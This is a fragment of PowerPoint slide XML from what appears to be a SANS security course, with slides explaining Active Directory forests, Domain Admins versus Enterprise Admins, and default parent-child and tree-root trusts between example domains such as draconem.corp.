                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Forests </a:t>
            </a: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are collections of trees that </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>trust</a:t>
            </a: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 one another</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According to Microsoft documentation, domains are not considered security boundaries, but forests are.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Graphic 5" descr="Fir tree">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A22D35D3-F46C-CAAA-223F-22B861E8B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08" y="1498456"/>
            <a:ext cx="465220" cy="465220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6" descr="Fir tree">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C05E6F90-DC0B-D2D2-7602-7CA815D664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066" y="1498456"/>
            <a:ext cx="465220" cy="465220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Graphic 7" descr="Fir tree">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70FD0848-43FA-CAFA-CEDF-B26B0196DC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3837" y="1822449"/>
            <a:ext cx="465220" cy="465220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Graphic 8" descr="Fir tree">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B12DE21B-EF09-1622-1E69-CEB89EED9B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618" y="1822449"/>
            <a:ext cx="465220" cy="465220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85F6DC57-B25D-FAA7-A63E-981A51DFAB41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472746" y="5652385"/>
            <a:ext cx="11290628" cy="69518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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Domain Admins</a:t>
            </a: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 are defined on a domain level (e.g., dev.draconem.corp)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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Enterprise Admins</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>" are defined in the root domain at forest level (e.g., draconem.corp and thunderbird.corp)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C15B0E9F-FB0C-BB53-550F-3C87A72CC19C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7144757" y="2608688"/>
            <a:ext cx="4618617" cy="2975303"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>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mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Trusts</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t> are used to allow authentication between multiple domains. By default, Microsoft creates the following trusts:</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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="214313" marR="0" lvl="0" indent="-21431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rPr>
              <a:t>Parent-child trust (two-way, transitive) when a new domain is added in a tree</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="214313" marR="0" lvl="0" indent="-21431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rPr>
              <a:t>Tree-root trust (two-way, transitive) when a new tree is added in a forest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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A variety of different trusts can be set up, depending on the specific use case.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="163419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40940-8E66-1966-E1E9-5C0B0926A085}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="5243513"/>
            <a:ext cx="11334750" cy="1189036"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Once a trust is set up, the authentication flow is arranged. Permissions still need to be assigned, however! This is typically performed by adding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>remote users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>local groups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="2400" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EAE3644-F457-9FE1-E7A2-08B842BEE91F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="300" noProof="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Trust Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{246791A0-3161-818B-B3D8-287A32552250}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1716880" y="1175198"/>
            <a:ext cx="8758239" cy="3943599"/>
            <a:chOff x="348799" y="892680"/>
            <a:chExt cx="6836479" cy="3078282"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle: Rounded Corners 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{763D4456-BA6E-71DD-89AB-F3F00E5D5C08}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="348799" y="995078"/>
              <a:ext cx="6836479" cy="2975884"/>
            </a:xfrm>
            <a:prstGeom prst="round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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Isosceles Triangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F16B478C-2A34-C442-CC44-8B15E33544D2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1170164" y="1473961"/>
              <a:ext cx="865998" cy="721665"/>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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Isosceles Triangle 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7429A9F9-8F7E-378E-6B10-0EF95F8782BC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1170164" y="2859640"/>
              <a:ext cx="865998" cy="721665"/>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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Isosceles Triangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EBB8593-CFD8-A2D8-431E-D0000269876F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5073228" y="1476770"/>
              <a:ext cx="865998" cy="721665"/>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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A838B187-2E3D-7A05-20B8-03CFC1E9FB27}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="685432" y="2311323"/>
              <a:ext cx="1876061"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Draconem.corp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35D5E364-5F3F-135A-F102-577A4F6A6025}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="789948" y="3581305"/>
              <a:ext cx="1688166"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dev.draconem.corp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69CD3579-1D34-0593-D4D2-9480BA1B2094}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2868306" y="892680"/>
              <a:ext cx="1259542"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565 Forest</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400C22B-A9F3-03FE-3E4E-F1A1E0D01987}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="973392" y="1097278"/>
              <a:ext cx="1259542"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Draconem Tree</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D87C44D-919B-7821-B180-F876ECA82FDC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4763220" y="1050255"/>
              <a:ext cx="1554817"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Thunderbird Tree</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5D8E9BC-D18A-355C-8875-68C6465BA33B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4828830" y="2248891"/>
              <a:ext cx="1423599"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Thunderbird.corp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle: Rounded Corners 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06F6FD74-F3EB-415B-2C8E-4A5C2EF9EB1C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4617437" y="1322792"/>
              <a:ext cx="1850715" cy="2494268"/>
            </a:xfrm>
            <a:prstGeom prst="round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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="16" name="Straight Arrow Connector 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEF01E68-5825-00EB-B93D-0FAD68609360}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1943100" y="1834793"/>
              <a:ext cx="3209925" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="B11116"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
              <a:headEnd type="triangle"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E16AF004-36E2-C8EE-60A9-AE0D61F88F15}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2918291" y="1548166"/>
              <a:ext cx="1259542" cy="24962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Tree-Root Trust</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Arc 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9520329-8EC1-2B78-03C3-599EAFD3DC8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1428864" y="2068670"/>
              <a:ext cx="1457325" cy="1348253"/>
            </a:xfrm>
            <a:prstGeom prst="arc">
              <a:avLst>
                <a:gd name="adj1" fmla="val 16200000"/>
                <a:gd name="adj2" fmla="val 5612400"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="B11116"/>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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Isosceles Triangle 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E414DF5-F428-7135-724A-0C7C39D5689C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="15692947">
              <a:off x="2090405" y="2027897"/>
              <a:ext cx="104775" cy="90323"/>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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Isosceles Triangle 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BDEE79A-4B66-B1BA-2929-B04C605A3156}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="15692947">
              <a:off x="2040907" y="3371761"/>
              <a:ext cx="104775" cy="90323"/>
            </a:xfrm>
            <a:prstGeom prst="triangl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nl-BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Rectangle 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E088EB1-1222-848A-2321-C78CD9ECC711}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2739558" y="3290266"/>
              <a:ext cx="1521408" cy="258135"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E3E1E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ea typeface="+mn-ea"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Parent-Child Trust</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3531554548"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.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To authors for review.pptx" id="{67A47CB2-3601-468B-96E2-9AFF35E4D334}" vid="{702DB3A6-B22E-49C0-A93D-44711A408EB3}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Roll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ANS">
  <a:themeElements>
    <a:clrScheme name="SANS">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="404041"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E6E7E8"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="005880"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="0455A5"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="B52624"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="40474E"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="519353"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="F5821F"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="418EDA"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="418EDA"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Arial">
      <a:majorFont>
        <a:latin typeface="Fira Sans Bold"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SANS / Cyber Defense / ICS">
      <a:srgbClr val="005880"/>
    </a:custClr>
    <a:custClr name="Blue Team Ops">
      <a:srgbClr val="0455A5"/>
    </a:custClr>
    <a:custClr name="Offensive Ops">
      <a:srgbClr val="B52624"/>
    </a:custClr>
    <a:custClr name="DFIR">
      <a:srgbClr val="40474E"/>
    </a:custClr>
    <a:custClr name="Leadership">
      <a:srgbClr val="519353"/>
    </a:custClr>
    <a:custClr name="Cloud Security">
      <a:srgbClr val="F5821F"/>
    </a:custClr>
    <a:custClr name="New2Cyber">
      <a:srgbClr val="F9A01B"/>
    </a:custClr>
  </a:custClrLst>
  <a:extLst>
    <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="SANS Course Template v2" id="{07202A7E-A44C-4948-BF59-260C3BE49DC7}" vid="{07B0C85B-9ACD-7141-8598-078E5DAF80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462DE8F92A7542BFDC3C3834D85FF4" ma:contentTypeVersion="13" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="91d68ae1aa1545e34ab3a7ae1ee95a1c">
